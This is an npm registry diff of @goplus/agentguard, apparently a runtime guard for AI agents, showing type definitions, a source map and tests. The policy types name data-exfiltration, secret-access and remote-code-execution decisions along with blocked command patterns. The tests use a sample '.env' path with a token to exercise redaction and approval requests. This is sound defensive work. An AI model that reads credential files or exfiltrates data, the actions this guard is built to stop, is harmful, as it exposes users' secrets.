@goplus/agentguard 1.1.1 → 1.1.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +41 -2
- package/dist/cli.d.ts +3 -0
- package/dist/cli.d.ts.map +1 -0
- package/dist/cli.js +335 -0
- package/dist/cli.js.map +1 -0
- package/dist/cloud/client.d.ts +41 -0
- package/dist/cloud/client.d.ts.map +1 -0
- package/dist/cloud/client.js +145 -0
- package/dist/cloud/client.js.map +1 -0
- package/dist/config.d.ts +31 -0
- package/dist/config.d.ts.map +1 -0
- package/dist/config.js +133 -0
- package/dist/config.js.map +1 -0
- package/dist/feed/selfcheck.d.ts +36 -0
- package/dist/feed/selfcheck.d.ts.map +1 -0
- package/dist/feed/selfcheck.js +198 -0
- package/dist/feed/selfcheck.js.map +1 -0
- package/dist/feed/state.d.ts +14 -0
- package/dist/feed/state.d.ts.map +1 -0
- package/dist/feed/state.js +57 -0
- package/dist/feed/state.js.map +1 -0
- package/dist/feed/types.d.ts +102 -0
- package/dist/feed/types.d.ts.map +1 -0
- package/dist/feed/types.js +15 -0
- package/dist/feed/types.js.map +1 -0
- package/dist/index.d.ts +7 -0
- package/dist/index.d.ts.map +1 -1
- package/dist/index.js +25 -1
- package/dist/index.js.map +1 -1
- package/dist/installers.d.ts +10 -0
- package/dist/installers.d.ts.map +1 -0
- package/dist/installers.js +137 -0
- package/dist/installers.js.map +1 -0
- package/dist/mcp-server.js +3 -2
- package/dist/mcp-server.js.map +1 -1
- package/dist/postinstall.d.ts +3 -0
- package/dist/postinstall.d.ts.map +1 -0
- package/dist/postinstall.js +13 -0
- package/dist/postinstall.js.map +1 -0
- package/dist/runtime/audit.d.ts +10 -0
- package/dist/runtime/audit.d.ts.map +1 -0
- package/dist/runtime/audit.js +94 -0
- package/dist/runtime/audit.js.map +1 -0
- package/dist/runtime/evaluator.d.ts +3 -0
- package/dist/runtime/evaluator.d.ts.map +1 -0
- package/dist/runtime/evaluator.js +197 -0
- package/dist/runtime/evaluator.js.map +1 -0
- package/dist/runtime/policy.d.ts +12 -0
- package/dist/runtime/policy.d.ts.map +1 -0
- package/dist/runtime/policy.js +81 -0
- package/dist/runtime/policy.js.map +1 -0
- package/dist/runtime/protect.d.ts +22 -0
- package/dist/runtime/protect.d.ts.map +1 -0
- package/dist/runtime/protect.js +172 -0
- package/dist/runtime/protect.js.map +1 -0
- package/dist/runtime/redaction.d.ts +6 -0
- package/dist/runtime/redaction.d.ts.map +1 -0
- package/dist/runtime/redaction.js +103 -0
- package/dist/runtime/redaction.js.map +1 -0
- package/dist/runtime/types.d.ts +62 -0
- package/dist/runtime/types.d.ts.map +1 -0
- package/dist/runtime/types.js +3 -0
- package/dist/runtime/types.js.map +1 -0
- package/dist/tests/cloud-live.test.d.ts +2 -0
- package/dist/tests/cloud-live.test.d.ts.map +1 -0
- package/dist/tests/cloud-live.test.js +68 -0
- package/dist/tests/cloud-live.test.js.map +1 -0
- package/dist/tests/feed-cloud.test.d.ts +2 -0
- package/dist/tests/feed-cloud.test.d.ts.map +1 -0
- package/dist/tests/feed-cloud.test.js +93 -0
- package/dist/tests/feed-cloud.test.js.map +1 -0
- package/dist/tests/feed-selfcheck.test.d.ts +2 -0
- package/dist/tests/feed-selfcheck.test.d.ts.map +1 -0
- package/dist/tests/feed-selfcheck.test.js +118 -0
- package/dist/tests/feed-selfcheck.test.js.map +1 -0
- package/dist/tests/installer.test.d.ts +2 -0
- package/dist/tests/installer.test.d.ts.map +1 -0
- package/dist/tests/installer.test.js +32 -0
- package/dist/tests/installer.test.js.map +1 -0
- package/dist/tests/runtime-cloud.test.d.ts +2 -0
- package/dist/tests/runtime-cloud.test.d.ts.map +1 -0
- package/dist/tests/runtime-cloud.test.js +206 -0
- package/dist/tests/runtime-cloud.test.js.map +1 -0
- package/dist/version.d.ts +2 -0
- package/dist/version.d.ts.map +1 -0
- package/dist/version.js +7 -0
- package/dist/version.js.map +1 -0
- package/docs/SECURITY-POLICY.md +558 -0
- package/docs/architecture.md +54 -0
- package/docs/claude-code.md +41 -0
- package/docs/cloud-connect.md +73 -0
- package/docs/cloud-native-api.md +526 -0
- package/docs/codex.md +38 -0
- package/docs/goplus-api.md +38 -0
- package/docs/mcp-server.md +39 -0
- package/docs/openclaw.md +41 -0
- package/docs/privacy-boundary.md +37 -0
- package/docs/sdk.md +83 -0
- package/docs/trust-cli.md +58 -0
- package/examples/openclaw-docker/Dockerfile +10 -0
- package/examples/openclaw-docker/README.md +16 -0
- package/examples/openclaw-docker/docker-compose.yml +8 -0
- package/examples/openclaw-docker/plugin.ts +8 -0
- package/package.json +7 -2
- package/skills/agentguard/SKILL.md +19 -0
- package/skills/agentguard/package.json +2 -1
- package/skills/agentguard/scripts/checkup-report.js +2 -15
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"redaction.js","sourceRoot":"","sources":["../../src/runtime/redaction.ts"],"names":[],"mappings":"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"}
|
|
@@ -0,0 +1,62 @@
|
|
|
1
|
+
export type CloudPolicyDecision = 'allow' | 'warn' | 'require_approval' | 'block';
|
|
2
|
+
export type RuntimeRiskLevel = 'safe' | 'low' | 'medium' | 'high' | 'critical';
|
|
3
|
+
export type RuntimeSeverity = 'info' | 'low' | 'medium' | 'high' | 'critical';
|
|
4
|
+
export type RuntimeActionType = 'shell' | 'file_read' | 'file_write' | 'network' | 'mcp_tool' | 'browser' | 'skill_install' | 'deploy' | 'other';
|
|
5
|
+
export type RuntimeAgentHost = 'claude-code' | 'codex' | 'openclaw' | 'cursor' | 'gemini' | 'copilot' | 'other';
|
|
6
|
+
export interface PolicyReason {
|
|
7
|
+
code: string;
|
|
8
|
+
severity: RuntimeSeverity;
|
|
9
|
+
title: string;
|
|
10
|
+
description: string;
|
|
11
|
+
evidence?: string;
|
|
12
|
+
remediation?: string;
|
|
13
|
+
}
|
|
14
|
+
export interface EffectiveRuntimePolicy {
|
|
15
|
+
policyVersion: string;
|
|
16
|
+
mode: 'observe' | 'balanced' | 'strict';
|
|
17
|
+
decisions: {
|
|
18
|
+
destructiveCommand: CloudPolicyDecision;
|
|
19
|
+
remoteCodeExecution: CloudPolicyDecision;
|
|
20
|
+
dataExfiltration: CloudPolicyDecision;
|
|
21
|
+
secretAccess: CloudPolicyDecision;
|
|
22
|
+
deployAction: CloudPolicyDecision;
|
|
23
|
+
};
|
|
24
|
+
protectedPaths: string[];
|
|
25
|
+
blockedCommandPatterns: string[];
|
|
26
|
+
allowedCommandPatterns: string[];
|
|
27
|
+
approvalActionTypes: RuntimeActionType[];
|
|
28
|
+
network: {
|
|
29
|
+
defaultOutbound: CloudPolicyDecision;
|
|
30
|
+
blockedDomains: string[];
|
|
31
|
+
approvalDomains: string[];
|
|
32
|
+
};
|
|
33
|
+
updatedAt: string;
|
|
34
|
+
}
|
|
35
|
+
export interface RuntimeAction {
|
|
36
|
+
sessionId: string;
|
|
37
|
+
agentHost: RuntimeAgentHost;
|
|
38
|
+
actionType: RuntimeActionType;
|
|
39
|
+
toolName: string;
|
|
40
|
+
input: string;
|
|
41
|
+
cwd?: string;
|
|
42
|
+
sourceSkill?: string;
|
|
43
|
+
metadata?: Record<string, unknown>;
|
|
44
|
+
}
|
|
45
|
+
export interface RuntimeDecision {
|
|
46
|
+
actionId: string;
|
|
47
|
+
decision: CloudPolicyDecision;
|
|
48
|
+
riskScore: number;
|
|
49
|
+
riskLevel: RuntimeRiskLevel;
|
|
50
|
+
reasons: PolicyReason[];
|
|
51
|
+
policyVersion: string;
|
|
52
|
+
expiresAt?: string;
|
|
53
|
+
}
|
|
54
|
+
export interface RuntimeAuditEvent extends RuntimeAction {
|
|
55
|
+
actionId: string;
|
|
56
|
+
decision: CloudPolicyDecision;
|
|
57
|
+
riskScore: number;
|
|
58
|
+
riskLevel: RuntimeRiskLevel;
|
|
59
|
+
reasons: PolicyReason[];
|
|
60
|
+
policyVersion: string;
|
|
61
|
+
}
|
|
62
|
+
//# sourceMappingURL=types.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"types.d.ts","sourceRoot":"","sources":["../../src/runtime/types.ts"],"names":[],"mappings":"AAAA,MAAM,MAAM,mBAAmB,GAAG,OAAO,GAAG,MAAM,GAAG,kBAAkB,GAAG,OAAO,CAAC;AAClF,MAAM,MAAM,gBAAgB,GAAG,MAAM,GAAG,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAC;AAC/E,MAAM,MAAM,eAAe,GAAG,MAAM,GAAG,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAC;AAE9E,MAAM,MAAM,iBAAiB,GACzB,OAAO,GACP,WAAW,GACX,YAAY,GACZ,SAAS,GACT,UAAU,GACV,SAAS,GACT,eAAe,GACf,QAAQ,GACR,OAAO,CAAC;AAEZ,MAAM,MAAM,gBAAgB,GACxB,aAAa,GACb,OAAO,GACP,UAAU,GACV,QAAQ,GACR,QAAQ,GACR,SAAS,GACT,OAAO,CAAC;AAEZ,MAAM,WAAW,YAAY;IAC3B,IAAI,EAAE,MAAM,CAAC;IACb,QAAQ,EAAE,eAAe,CAAC;IAC1B,KAAK,EAAE,MAAM,CAAC;IACd,WAAW,EAAE,MAAM,CAAC;IACpB,QAAQ,CAAC,EAAE,MAAM,CAAC;IAClB,WAAW,CAAC,EAAE,MAAM,CAAC;CACtB;AAED,MAAM,WAAW,sBAAsB;IACrC,aAAa,EAAE,MAAM,CAAC;IACtB,IAAI,EAAE,SAAS,GAAG,UAAU,GAAG,QAAQ,CAAC;IACxC,SAAS,EAAE;QACT,kBAAkB,EAAE,mBAAmB,CAAC;QACxC,mBAAmB,EAAE,mBAAmB,CAAC;QACzC,gBAAgB,EAAE,mBAAmB,CAAC;QACtC,YAAY,EAAE,mBAAmB,CAAC;QAClC,YAAY,EAAE,mBAAmB,CAAC;KACnC,CAAC;IACF,cAAc,EAAE,MAAM,EAAE,CAAC;IACzB,sBAAsB,EAAE,MAAM,EAAE,CAAC;IACjC,sBAAsB,EAAE,MAAM,EAAE,CAAC;IACjC,mBAAmB,EAAE,iBAAiB,EAAE,CAAC;IACzC,OAAO,EAAE;QACP,eAAe,EAAE,mBAAmB,CAAC;QACrC,cAAc,EAAE,MAAM,EAAE,CAAC;QACzB,eAAe,EAAE,MAAM,EAAE,CAAC;KAC3B,CAAC;IACF,SAAS,EAAE,MAAM,CAAC;CACnB;AAED,MAAM,WAAW,aAAa;IAC5B,SAAS,EAAE,MAAM,CAAC;IAClB,SAAS,EAAE,gBAAgB,CAAC;IAC5B,UAAU,EAAE,iBAAiB,CAAC;IAC9B,QAAQ,EAAE,MAAM,CAAC;IACjB,KAAK,EAAE,MAAM,CAAC;IACd,GAAG,CAAC,EAAE,MAAM,CAAC;IACb,WAAW,CAAC,EAAE,MAAM,CAAC;IACrB,QAAQ,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,OAAO,CAAC,CAAC;CACpC;AAED,MAAM,WAAW,eAAe;IAC9B,QAAQ,EAAE,MAAM,CAAC;IACjB,QAAQ,EAAE,mBAAmB,CAAC;IAC9B,SAAS,EAAE,MAAM,CAAC;IAClB,SAAS,EAAE,gBAAgB,CAAC;IAC5B,OAAO,EAAE,YAAY,EAAE,CAAC;IACxB,aAAa,EAAE,MAAM,CAAC;IACtB,SAAS,CAAC,EAAE,MAAM,CAAC;CACpB;AAED,MAAM,WAAW,iBAAkB,SAAQ,aAAa;IACtD,QAAQ,EAAE,MAAM,CAAC;IACjB,QAAQ,EAAE,mBAAmB,CAAC;IAC9B,SAAS,EAAE,MAAM,CAAC;IAClB,SAAS,EAAE,gBAAgB,CAAC;IAC5B,OAAO,EAAE,YAAY,EAAE,CAAC;IACxB,aAAa,EAAE,MAAM,CAAC;CACvB"}
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"types.js","sourceRoot":"","sources":["../../src/runtime/types.ts"],"names":[],"mappings":""}
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"cloud-live.test.d.ts","sourceRoot":"","sources":["../../src/tests/cloud-live.test.ts"],"names":[],"mappings":""}
|
|
@@ -0,0 +1,68 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
var __importDefault = (this && this.__importDefault) || function (mod) {
|
|
3
|
+
return (mod && mod.__esModule) ? mod : { "default": mod };
|
|
4
|
+
};
|
|
5
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
6
|
+
const node_test_1 = require("node:test");
|
|
7
|
+
const strict_1 = __importDefault(require("node:assert/strict"));
|
|
8
|
+
const client_js_1 = require("../cloud/client.js");
|
|
9
|
+
const apiKey = process.env.AGENTGUARD_API_KEY;
|
|
10
|
+
const cloudUrl = process.env.AGENTGUARD_CLOUD_URL || 'https://agentguard.gopluslabs.io';
|
|
11
|
+
const runLive = Boolean(apiKey);
|
|
12
|
+
(0, node_test_1.describe)('Cloud live integration', { skip: !runLive }, () => {
|
|
13
|
+
const config = {
|
|
14
|
+
version: 1,
|
|
15
|
+
level: 'balanced',
|
|
16
|
+
cloudUrl,
|
|
17
|
+
apiKey,
|
|
18
|
+
policyCachePath: '',
|
|
19
|
+
auditPath: '',
|
|
20
|
+
eventSpoolPath: '',
|
|
21
|
+
};
|
|
22
|
+
const client = new client_js_1.AgentGuardCloudClient(config);
|
|
23
|
+
(0, node_test_1.it)('fetches effective policy from the configured Cloud', async () => {
|
|
24
|
+
const policy = await client.fetchEffectivePolicy();
|
|
25
|
+
strict_1.default.ok(policy.policyVersion);
|
|
26
|
+
strict_1.default.ok(policy.decisions);
|
|
27
|
+
});
|
|
28
|
+
(0, node_test_1.it)('ingests a redacted runtime audit event', async () => {
|
|
29
|
+
const event = sampleEvent('warn');
|
|
30
|
+
event.input = 'echo safe --api_key=live-secret-that-must-be-redacted';
|
|
31
|
+
await client.ingestEvents([event]);
|
|
32
|
+
});
|
|
33
|
+
(0, node_test_1.it)('creates a Cloud approval request', async () => {
|
|
34
|
+
const event = sampleEvent('require_approval');
|
|
35
|
+
event.input = '/tmp/.env?token=live-secret-that-must-be-redacted';
|
|
36
|
+
event.riskScore = 55;
|
|
37
|
+
event.riskLevel = 'high';
|
|
38
|
+
event.reasons = [
|
|
39
|
+
{
|
|
40
|
+
code: 'SECRET_ACCESS',
|
|
41
|
+
severity: 'high',
|
|
42
|
+
title: 'Live test protected path access',
|
|
43
|
+
description: 'Live integration test verifies approval creation.',
|
|
44
|
+
evidence: '/tmp/.env?token=live-secret-that-must-be-redacted',
|
|
45
|
+
},
|
|
46
|
+
];
|
|
47
|
+
const approvalId = await client.createApproval(event);
|
|
48
|
+
strict_1.default.ok(approvalId);
|
|
49
|
+
});
|
|
50
|
+
});
|
|
51
|
+
function sampleEvent(decision) {
|
|
52
|
+
const suffix = `${Date.now()}_${Math.random().toString(36).slice(2)}`;
|
|
53
|
+
return {
|
|
54
|
+
actionId: `act_live_${suffix}`,
|
|
55
|
+
sessionId: `sess_live_${suffix}`,
|
|
56
|
+
agentHost: 'codex',
|
|
57
|
+
actionType: 'shell',
|
|
58
|
+
toolName: 'Bash',
|
|
59
|
+
input: 'echo safe',
|
|
60
|
+
decision,
|
|
61
|
+
riskScore: decision === 'allow' ? 0 : 20,
|
|
62
|
+
riskLevel: decision === 'allow' ? 'safe' : 'medium',
|
|
63
|
+
reasons: [],
|
|
64
|
+
policyVersion: 'live-test',
|
|
65
|
+
metadata: { test: 'cloud-live' },
|
|
66
|
+
};
|
|
67
|
+
}
|
|
68
|
+
//# sourceMappingURL=cloud-live.test.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"cloud-live.test.js","sourceRoot":"","sources":["../../src/tests/cloud-live.test.ts"],"names":[],"mappings":"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"}
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"feed-cloud.test.d.ts","sourceRoot":"","sources":["../../src/tests/feed-cloud.test.ts"],"names":[],"mappings":""}
|
|
@@ -0,0 +1,93 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
var __importDefault = (this && this.__importDefault) || function (mod) {
|
|
3
|
+
return (mod && mod.__esModule) ? mod : { "default": mod };
|
|
4
|
+
};
|
|
5
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
6
|
+
const node_test_1 = require("node:test");
|
|
7
|
+
const strict_1 = __importDefault(require("node:assert/strict"));
|
|
8
|
+
const node_http_1 = require("node:http");
|
|
9
|
+
const client_js_1 = require("../cloud/client.js");
|
|
10
|
+
function startServer(handler) {
|
|
11
|
+
return new Promise((resolve) => {
|
|
12
|
+
const server = (0, node_http_1.createServer)(handler);
|
|
13
|
+
server.listen(0, '127.0.0.1', () => {
|
|
14
|
+
const { port } = server.address();
|
|
15
|
+
resolve({ url: `http://127.0.0.1:${port}`, server });
|
|
16
|
+
});
|
|
17
|
+
});
|
|
18
|
+
}
|
|
19
|
+
(0, node_test_1.describe)('cloud client — feed methods', () => {
|
|
20
|
+
let baseUrl;
|
|
21
|
+
let server;
|
|
22
|
+
let lastRequest = null;
|
|
23
|
+
let nextResponse = { status: 200, body: {} };
|
|
24
|
+
(0, node_test_1.before)(async () => {
|
|
25
|
+
const started = await startServer(async (req, res) => {
|
|
26
|
+
const chunks = [];
|
|
27
|
+
for await (const chunk of req)
|
|
28
|
+
chunks.push(chunk);
|
|
29
|
+
const raw = Buffer.concat(chunks).toString('utf8');
|
|
30
|
+
lastRequest = { url: req.url, method: req.method, body: raw ? JSON.parse(raw) : undefined };
|
|
31
|
+
res.statusCode = nextResponse.status;
|
|
32
|
+
res.setHeader('content-type', 'application/json');
|
|
33
|
+
res.end(JSON.stringify(nextResponse.body));
|
|
34
|
+
});
|
|
35
|
+
baseUrl = started.url;
|
|
36
|
+
server = started.server;
|
|
37
|
+
});
|
|
38
|
+
(0, node_test_1.after)(() => {
|
|
39
|
+
server.close();
|
|
40
|
+
});
|
|
41
|
+
(0, node_test_1.it)('pullAdvisories returns advisories on 200', async () => {
|
|
42
|
+
nextResponse = {
|
|
43
|
+
status: 200,
|
|
44
|
+
body: {
|
|
45
|
+
success: true,
|
|
46
|
+
data: {
|
|
47
|
+
advisories: [
|
|
48
|
+
{
|
|
49
|
+
id: 'AGS-2026-1',
|
|
50
|
+
ecosystem: 'skill',
|
|
51
|
+
severity: 'high',
|
|
52
|
+
summary: 's',
|
|
53
|
+
detailsMd: '',
|
|
54
|
+
affected: [{ namePattern: 'foo' }],
|
|
55
|
+
publishedAt: '2026-05-13T00:00:00Z',
|
|
56
|
+
},
|
|
57
|
+
],
|
|
58
|
+
},
|
|
59
|
+
},
|
|
